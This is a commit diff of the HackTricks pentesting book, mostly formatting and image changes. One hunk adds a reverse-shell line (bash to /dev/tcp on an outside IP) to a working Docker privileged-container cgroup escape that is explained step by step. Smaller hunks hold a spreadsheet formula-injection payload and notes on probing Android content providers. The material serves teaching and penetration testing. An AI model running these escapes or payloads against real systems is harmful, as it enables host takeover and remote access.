GitBook: [master] 9 pages and 27 assets modified
CPol
gitbook-bot
|
Before Width: | Height: | Size: 21 KiB After Width: | Height: | Size: 21 KiB |
|
After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
|
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
|
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 34 KiB |
|
Before Width: | Height: | Size: 172 KiB After Width: | Height: | Size: 172 KiB |
|
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 34 KiB |
|
Before Width: | Height: | Size: 93 KiB After Width: | Height: | Size: 93 KiB |
|
Before Width: | Height: | Size: 93 KiB After Width: | Height: | Size: 93 KiB |
|
Before Width: | Height: | Size: 798 KiB After Width: | Height: | Size: 798 KiB |
|
Before Width: | Height: | Size: 5.2 KiB After Width: | Height: | Size: 5.2 KiB |
|
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
|
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
|
Before Width: | Height: | Size: 112 KiB After Width: | Height: | Size: 112 KiB |
|
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
InfluxDB
|
InfluxDB
|
||||||
|
|
||||||
|
|
|
||||||
14
README.md
|
|
@ -1,7 +1,5 @@
|
||||||
# HackTricks
|
# HackTricks
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
**Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
|
**Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
|
||||||
|
|
@ -14,14 +12,14 @@ Here you will find the **typical flow** that **you should follow when pentesting
|
||||||
|
|
||||||
**Click in the title to start!**
|
**Click in the title to start!**
|
||||||
|
|
||||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.
|
||||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||||
|
|
||||||
<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" /></a><br>Copyright © Carlos Polop 2020. Except where otherwise specified, the text on <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> by Carlos Polop is licensed under the <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0)</a>.
|
|
||||||
|
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [Creative Commons Attribution-ShareAlike License 4.0 \(International\) \(CC-BY-SA 4.0\)](https://creativecommons.org/licenses/by-sa/4.0/).
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -29,10 +29,17 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||||
echo 1 > /tmp/cgrp/x/notify_on_release
|
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||||
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||||
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||||
|
|
||||||
|
#For a normal PoC =================
|
||||||
echo '#!/bin/sh' > /cmd
|
echo '#!/bin/sh' > /cmd
|
||||||
echo "ps aux > $host_path/output" >> /cmd
|
echo "ps aux > $host_path/output" >> /cmd
|
||||||
chmod a+x /cmd
|
chmod a+x /cmd
|
||||||
|
#===================================
|
||||||
|
#Reverse shell
|
||||||
|
echo '#!/bin/bash' > /cmd
|
||||||
|
echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
|
||||||
|
chmod a+x /cmd
|
||||||
|
#===================================
|
||||||
|
|
||||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
head /output
|
head /output
|
||||||
|
|
@ -58,7 +65,7 @@ A container would be vulnerable to this technique if run with the flags: `--secu
|
||||||
|
|
||||||
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
|
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
|
||||||
|
|
||||||
To trigger this exploit we need a cgroup where we can create a `release_agent` file _and_ trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
|
To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
|
||||||
|
|
||||||
To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.
|
To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.
|
||||||
|
|
||||||
|
|
@ -68,7 +75,7 @@ Note that cgroup controllers are global resources that can be mounted multiple t
|
||||||
|
|
||||||
We can see the “x” child cgroup creation and its directory listing below.
|
We can see the “x” child cgroup creation and its directory listing below.
|
||||||
|
|
||||||
```bash
|
```text
|
||||||
root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||||
root@b11cf9eab4fd:/# ls /tmp/cgrp/
|
root@b11cf9eab4fd:/# ls /tmp/cgrp/
|
||||||
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x
|
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x
|
||||||
|
|
@ -82,7 +89,7 @@ The files we add or modify in the container are present on the host, and it is p
|
||||||
|
|
||||||
Those operations can be seen below:
|
Those operations can be seen below:
|
||||||
|
|
||||||
```bash
|
```text
|
||||||
root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
|
root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
|
||||||
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||||
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||||
|
|
@ -90,14 +97,14 @@ root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||||
|
|
||||||
Note the path to the `/cmd` script, which we are going to create on the host:
|
Note the path to the `/cmd` script, which we are going to create on the host:
|
||||||
|
|
||||||
```bash
|
```text
|
||||||
root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
|
root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
|
||||||
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
|
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
|
||||||
```
|
```
|
||||||
|
|
||||||
Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents:
|
Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents:
|
||||||
|
|
||||||
```bash
|
```text
|
||||||
root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
|
root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
|
||||||
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
|
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
|
||||||
root@b11cf9eab4fd:/# chmod a+x /cmd
|
root@b11cf9eab4fd:/# chmod a+x /cmd
|
||||||
|
|
@ -108,7 +115,7 @@ ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c7
|
||||||
|
|
||||||
Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container:
|
Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container:
|
||||||
|
|
||||||
```bash
|
```text
|
||||||
root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
root@b11cf9eab4fd:/# head /output
|
root@b11cf9eab4fd:/# head /output
|
||||||
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
|
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
|
||||||
|
|
@ -121,7 +128,6 @@ root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq]
|
||||||
root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0]
|
root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0]
|
||||||
root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
|
root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
|
||||||
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
|
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
## `--privileged` flag v2
|
## `--privileged` flag v2
|
||||||
|
|
|
||||||
|
|
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
||||||
|
|
||||||
You should also check the **ContentProvider code** to search for queries:
|
You should also check the **ContentProvider code** to search for queries:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
|
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
|
||||||
|
|
||||||
|
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Because you will be able to call them
|
Because you will be able to call them
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
|
||||||
|
|
||||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -24,7 +24,7 @@ Accessing _/user/<number>_ you can see the number of existing users, in th
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Hidden pages enumeration
|
## Hidden pages enumeration
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
||||||
</methodCall>
|
</methodCall>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
|
||||||
|
|
||||||
Note the use of more constants
|
Note the use of more constants
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## CRC \(hash\)
|
## CRC \(hash\)
|
||||||
|
|
||||||
|
|
@ -177,7 +177,7 @@ A CRC hash algorithm looks like:
|
||||||
|
|
||||||
The graph is quiet large:
|
The graph is quiet large:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Check **3 comparisons to recognise it**:
|
Check **3 comparisons to recognise it**:
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
|
||||||
|
|
||||||
Note the spotless' user membership:
|
Note the spotless' user membership:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
However, we can still add new users:
|
However, we can still add new users:
|
||||||
|
|
||||||
|
|
|
||||||